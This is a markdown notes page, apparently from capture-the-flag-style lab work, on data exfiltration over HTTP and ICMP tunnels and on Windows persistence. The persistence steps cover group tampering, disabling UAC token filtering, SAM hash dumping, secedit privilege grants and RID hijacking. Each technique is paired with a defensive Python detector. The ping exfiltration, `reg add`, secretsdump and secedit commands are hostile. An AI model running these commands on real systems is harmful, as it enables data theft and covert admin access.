# Processes

> [!NOTE]
> Heavy work in progress

A curated list of steps/processes to use when tackling a certain problem.

When dealing with a challenge, you have to come up with a plan before you can come up with a solution. But you are not the first person to have dealt with it, so here I present a list of processes I have used that can help me and others find the right programs/commands for the job.
## Subjects

### Knowledge Bases

| 📰 Name | ℹ️ Description | 🔗 Link |
|---|---|---|
| | | |

### Cheatsheets

| 📰 Name | ℹ️ Description | 🔗 Link |
|---|---|---|
| | | |

### Tools Top Tips

| 📰 Name | ℹ️ Description | 🔗 Link |
|---|---|---|
| | | |
## Data Exfiltration

### TCP Socket

### SSH

### HTTP(S)

### HTTP Tunneling

HTTP tunneling encapsulates other protocols and sends them back and forth over HTTP. Create an HTTP tunnel as a communication channel to pivot into the internal network and talk to local network devices through the HTTP protocol.

Use the Neo-reGeorg tool to establish a communication channel to the internal network devices:

- Generate a Neo-reGeorg key.
- Upload the tunnel file to the victim web server.
- Create the tunnel.
- Connect to a machine behind the web server through the tunnel.
### ICMP

Sending data inside ICMP ping packets.

#### Manually

- Convert the payload into hex, for example with xxd.
- Send a ping request carrying the payload:

```sh
ping <IP> -c <nr of requests> -p <payload in hex format>
ping 10.10.230.138 -c 1 -p 74686d3a7472796861636b6d650a
```

- Capture the request with e.g., Wireshark.

#### MetaSploit

- Select the `icmp_exfil` module to set up a listener that captures ICMP packets. It starts recording upon receiving a BOF (beginning of file) trigger and stops when an EOF trigger is received.
- Set the correct interface to listen on.
- Metasploit now waits for the beginning-of-file trigger as stated.
- Using nping or regular ping, send the BOF trigger from the victim machine to start recording data.
- Send the rest of the data in the same manner.
- Send the EOF trigger.
- Find the loot in the location stated by the module (on the attack machine).
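A defender-side check for the ICMP technique above: both the manual `ping -p` payload and the Metasploit `icmp_exfil` flow ride in the echo-request data field. This is an added example and not part of the original notes: it parses raw IPv4/ICMP bytes (what a pcap reader or raw socket hands you) and flags echo requests whose data does not follow the pattern a stock ping sends. The packets, addresses and timestamp bytes below are constructed for the example; the only value reused from the notes is the hex payload of the ping command.

```python
"""Flag ICMP echo requests carrying data that a stock ping would not send.

Added example for these notes, not part of the original page. Linux iputils
fills data byte i with the value i and then overwrites the first 16 bytes with
a struct timeval; Windows ping sends the fixed string below. A `-p` pattern or
a tunnelling tool breaks both patterns, which is what this reports.
"""
import struct
from typing import Dict, List, Optional

ICMP_ECHO_REQUEST = 8
TIMESTAMP_LEN = 16   # 64-bit iputils overwrites data[0:16] with the send timestamp
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_echo_data(packet: bytes) -> Optional[bytes]:
    """Return the data field of an IPv4 ICMP echo request, or None for anything else."""
    if len(packet) < 20:
        return None
    ihl = (packet[0] & 0x0F) * 4                      # IPv4 header length in bytes
    if packet[9] != 1 or len(packet) < ihl + 8:       # IP protocol 1 = ICMP
        return None
    if packet[ihl] != ICMP_ECHO_REQUEST:              # ICMP type byte
        return None
    return packet[ihl + 8:]                            # after type/code/checksum/id/seq


def looks_like_stock_ping(data: bytes) -> bool:
    """True if the data matches the Windows string or the Linux counting pattern."""
    if data == WINDOWS_PING_DATA:
        return True
    if len(data) <= TIMESTAMP_LEN:
        return False                                   # too short to judge; report it
    expected = bytes(i & 0xFF for i in range(TIMESTAMP_LEN, len(data)))
    return data[TIMESTAMP_LEN:] == expected


def scan(packets: List[bytes]) -> List[Dict[str, object]]:
    """Return one finding per echo request whose data is not a stock pattern."""
    findings = []
    for index, packet in enumerate(packets):
        data = icmp_echo_data(packet)
        if data is None or looks_like_stock_ping(data):
            continue
        body = data[TIMESTAMP_LEN:] if len(data) > TIMESTAMP_LEN else data
        findings.append({
            "packet": index,
            "length": len(data),
            "printable_ratio": round(sum(32 <= b < 127 for b in body) / max(len(body), 1), 2),
            "decoded": body.decode("ascii", errors="replace"),
        })
    return findings


# --- constructed sample traffic ---------------------------------------------

def build_echo_request(data: bytes) -> bytes:
    """Build a minimal IPv4 + ICMP echo request around `data` (checksums left zero)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(data), 0x1234, 0, 64, 1, 0,
                     bytes([10, 10, 10, 5]), bytes([10, 10, 230, 138]))
    icmp = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, 0x4242, 1)
    return ip + icmp + data


FAKE_TIMESTAMP = bytes(range(0xA0, 0xA0 + TIMESTAMP_LEN))      # stands in for gettimeofday()
LINUX_STOCK = build_echo_request(FAKE_TIMESTAMP + bytes(range(TIMESTAMP_LEN, 56)))
WINDOWS_STOCK = build_echo_request(WINDOWS_PING_DATA)
PATTERN = bytes.fromhex("74686d3a7472796861636b6d650a")          # "thm:tryhackme\n" from the notes
EXFIL = build_echo_request(FAKE_TIMESTAMP + (PATTERN * 5)[TIMESTAMP_LEN:56])

if __name__ == "__main__":
    for finding in scan([LINUX_STOCK, WINDOWS_STOCK, EXFIL]):
        print(finding)
```

Run against real traffic by feeding `scan()` the raw IPv4 frames from a capture; the printable ratio and decoded preview are there to triage hits quickly, since tunnelling tools produce binary or base64-looking bodies rather than the plain text of the ping example.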
#### Tunneling

The ICMPDoor tool can be used to create an ICMP tunnel.

🔗 https://github.com/krabelize/icmpdoor

- Set up a host on the victim machine.
- Set up a client on the attack machine.
- Send commands to the victim machine as usual.
### DNS

### Misc

## Persistence

### Linux

### Windows
#### Tampering With Unprivileged Accounts

##### Assign Group Memberships

- Make the user part of the Administrators group.
- If that is too suspicious, add the user to the Backup Operators and Remote Management Users groups instead (the latter for remote access):

```cmd
net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
```

- Disable UAC privilege stripping for remote users:

```cmd
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```

- Remote into the machine (RDP or Evil-WinRM).
- Export and download the SAM and SYSTEM registry hives.
- Dump the hashes from the SAM and SYSTEM hives:

```sh
python /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
```

- Pass the hash with the admin account.
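A check that spots the changes from the steps above from the defender's side. It is an added example, not from the original notes: it parses the text output of `net localgroup "<group>"` and of `reg query ... /v LocalAccountTokenFilterPolicy`, flags members of the sensitive groups that are not on a baseline, and reports whether UAC token filtering for remote local accounts has been switched off. The command outputs and the baseline below are constructed for the example; replace the baseline with the expected membership of your own machines.

```python
"""Audit sensitive local-group membership and the UAC remote token filter.

Added example; the command outputs below are constructed samples of what
`net localgroup "<group>"` and `reg query <key> /v LocalAccountTokenFilterPolicy`
print, and BASELINE is an assumed expected membership, not a Windows default.
"""
import re
from typing import Dict, List, Set

# Assumed expected membership per group (example baseline, adjust per host).
BASELINE: Dict[str, Set[str]] = {
    "Administrators": {"Administrator"},
    "Backup Operators": set(),
    "Remote Management Users": set(),
}


def parse_net_localgroup(output: str) -> List[str]:
    """Return the member names printed by `net localgroup <group>`."""
    members: List[str] = []
    in_members = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("----"):               # member list follows the dashed rule
            in_members = True
            continue
        if line.startswith("The command completed"):
            break
        if in_members and line:
            members.append(line)
    return members


def unexpected_members(group: str, output: str) -> Set[str]:
    """Members of `group` that the baseline does not list."""
    return set(parse_net_localgroup(output)) - BASELINE.get(group, set())


def token_filter_disabled(reg_output: str) -> bool:
    """True when LocalAccountTokenFilterPolicy is 1 (remote local admins keep a full token)."""
    match = re.search(r"LocalAccountTokenFilterPolicy\s+REG_DWORD\s+0x([0-9A-Fa-f]+)", reg_output)
    return bool(match) and int(match.group(1), 16) == 1


def audit(group_outputs: Dict[str, str], reg_output: str) -> List[str]:
    """Human-readable findings for a set of group listings plus the reg query output."""
    findings = []
    for group, output in group_outputs.items():
        for member in sorted(unexpected_members(group, output)):
            findings.append(f"{member} is in '{group}' but not in the baseline")
    if token_filter_disabled(reg_output):
        findings.append("LocalAccountTokenFilterPolicy is 1: UAC token filtering for remote local accounts is off")
    return findings


# Constructed sample output of: net localgroup "Backup Operators"
SAMPLE_BACKUP_OPERATORS = """\
Alias name     Backup Operators
Comment        Backup Operators can override security restrictions for the sole purpose of backing up or restoring files

Members

-------------------------------------------------------------------------------
thmuser1
The command completed successfully.
"""

# Constructed sample output of the reg query for the value set in the notes
SAMPLE_REG_QUERY = """\

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1

"""

if __name__ == "__main__":
    for line in audit({"Backup Operators": SAMPLE_BACKUP_OPERATORS}, SAMPLE_REG_QUERY):
        print(line)
```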
##### Special Privileges and Security Descriptors

- Add SeBackupPrivilege and SeRestorePrivilege to an account: export the local security policy, add the account to both privilege entries in the exported file, then import and apply it:

```cmd
secedit /export /cfg config.ini
secedit /import /cfg config.ini /db config.db
secedit /configure /db config.db /cfg config.ini
```

- Change the WinRM security descriptor and add the user there with full control.
- Disable UAC privilege stripping for remote users:

```cmd
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```
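A check for the privilege change above, added as an example and not part of the original notes. `secedit /export /cfg config.ini` writes an INF file whose `[Privilege Rights]` section lists, per user right, the SIDs (prefixed with `*`) or account names that hold it. The code parses that section and flags any holder of SeBackupPrivilege or SeRestorePrivilege that is not one of the default groups. The sample INF text, the domain SID in it and the default-holder set (assumed for a standalone workstation) are constructed for the example.

```python
"""Flag non-default holders of SeBackupPrivilege / SeRestorePrivilege in a secedit export.

Added example for these notes; the INF text and the SID in it are constructed.
"""
from typing import Dict, List, Set

# Default holders on a standalone workstation (assumption for the example):
# Administrators (S-1-5-32-544) and Backup Operators (S-1-5-32-551).
DEFAULT_HOLDERS: Dict[str, Set[str]] = {
    "SeBackupPrivilege": {"*S-1-5-32-544", "*S-1-5-32-551"},
    "SeRestorePrivilege": {"*S-1-5-32-544", "*S-1-5-32-551"},
}


def parse_privilege_rights(inf_text: str) -> Dict[str, List[str]]:
    """Return {privilege: [holders]} from the [Privilege Rights] section of a secedit INF."""
    rights: Dict[str, List[str]] = {}
    section = None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):            # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Privilege Rights" and "=" in line:
            name, _, holders = line.partition("=")
            rights[name.strip()] = [h.strip() for h in holders.split(",") if h.strip()]
    return rights


def unexpected_holders(inf_text: str) -> Dict[str, Set[str]]:
    """Holders of the watched privileges that are not in DEFAULT_HOLDERS."""
    rights = parse_privilege_rights(inf_text)
    findings: Dict[str, Set[str]] = {}
    for privilege, expected in DEFAULT_HOLDERS.items():
        extra = set(rights.get(privilege, [])) - expected
        if extra:
            findings[privilege] = extra
    return findings


# Constructed export: the last SID on the two watched lines is a placeholder
# local account, the kind of entry the secedit steps above add.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-21-111111111-222222222-333333333-1010
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-21-111111111-222222222-333333333-1010
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
"""

if __name__ == "__main__":
    for privilege, extra in unexpected_holders(SAMPLE_INF).items():
        print(privilege, "also held by", ", ".join(sorted(extra)))
```

A real export is UTF-16 with a BOM, so open it with `encoding="utf-16"` before passing the text in; on a domain controller or member server the default holders differ (Server Operators, for instance), so adjust `DEFAULT_HOLDERS` to the role of the machine.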
##### RID Hijacking

- Find the RIDs of the user and the admin user.
- Open regedit with privileges (the tool must be present on the target system).
- Find the users in the registry under `HKLM\SAM\SAM\Domains\Account\Users\` (each key is the RID as hex, e.g., a user with RID 1010 sits under 000003F2).
- Convert the admin RID to hex (the built-in Administrator RID 500 = 0x1F4) and change the F value within the user's key to hold the admin RID in little-endian notation (0x01F4 -> F4 01).
- The admin hex RID usually is F4 01; put it on line 0030 of the F value.
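A check for the F value manipulation above, added as an example and not part of the original notes. The RID is stored as a 32-bit little-endian integer at offset 0x30 of the F value (the `0030` line in regedit's hex editor), and the user's key name is the same RID written as eight hex digits, so a key whose F value carries a different RID is the tell-tale of a hijack. The code assumes the user keys and their F values have already been read from the SAM hive (with an offline hive parser or from a registry export) into a dictionary; the F values below are constructed minimal blobs carrying only the RID field.

```python
"""Detect RID hijacking by comparing each SAM user key name with its F value.

Added example; the SAM data below is constructed, not read from a real hive.
"""
import struct
from typing import Dict, List, Tuple

RID_OFFSET = 0x30          # offset of the 32-bit little-endian RID inside the F value
F_MIN_LEN = RID_OFFSET + 4


def rid_from_f(f_value: bytes) -> int:
    """Return the RID stored in an F value (the account the key actually resolves to)."""
    if len(f_value) < F_MIN_LEN:
        raise ValueError("F value too short to contain a RID")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def key_rid(key_name: str) -> int:
    """Key names under Domains\\Account\\Users are the RID as eight hex digits."""
    return int(key_name, 16)


def find_rid_mismatches(users: Dict[str, bytes]) -> List[Tuple[str, int, int]]:
    """Return (key_name, rid_from_key, rid_from_f) for every key pointing elsewhere."""
    findings = []
    for name, f_value in users.items():
        expected, actual = key_rid(name), rid_from_f(f_value)
        if expected != actual:
            findings.append((name, expected, actual))
    return findings


def make_f_value(rid: int) -> bytes:
    """Construct a minimal 0x50-byte F value carrying only the RID field (sample data)."""
    buf = bytearray(0x50)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


# Constructed hive contents: the built-in Administrator, one normal user, and a
# user (RID 1010) whose F value has been pointed at RID 500, i.e. bytes F4 01 00 00
# at offset 0x30, exactly the edit described in the notes.
SAMPLE_USERS: Dict[str, bytes] = {
    "000001F4": make_f_value(500),
    "000003E9": make_f_value(1001),
    "000003F2": make_f_value(500),
}

if __name__ == "__main__":
    for name, expected, actual in find_rid_mismatches(SAMPLE_USERS):
        print(f"{name}: key says RID {expected}, F value says RID {actual}")
```

Because the key name and the F value normally agree on a clean system, this comparison has no baseline to maintain; run it over the `Users` subkeys of an exported or mounted SAM hive and any mismatch is worth investigating.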